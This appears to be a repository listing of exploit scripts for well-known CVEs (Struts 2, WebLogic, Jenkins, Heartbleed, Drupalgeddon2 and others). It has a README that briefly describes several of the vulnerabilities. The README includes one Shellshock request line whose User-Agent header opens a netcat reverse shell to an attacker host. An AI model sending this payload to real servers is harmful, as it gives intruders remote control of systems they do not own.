521d61d956 | ||
---|---|---|
.. | ||
Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py | ||
Apache Struts 2 CVE-2017-5638.py | ||
Apache Struts 2 CVE-2017-9805.py | ||
Apache Struts 2 CVE-2018-11776.py | ||
Docker API RCE.py | ||
Drupalgeddon2 CVE-2018-7600.rb | ||
Heartbleed CVE-2014-0160.py | ||
JBoss CVE-2015-7501.py | ||
Jenkins CVE-2015-8103.py | ||
Jenkins CVE-2016-0792.py | ||
README.md | ||
Shellshock CVE-2014-6271.py | ||
Tomcat CVE-2017-12617.py | ||
WebLogic CVE-2016-3510.py | ||
WebLogic CVE-2017-10271.py | ||
WebLogic CVE-2018-2894.py | ||
WebSphere CVE-2015-7450.py |
README.md
Common Vulnerabilities and Exposures
Big CVEs in the last 5 years.
CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.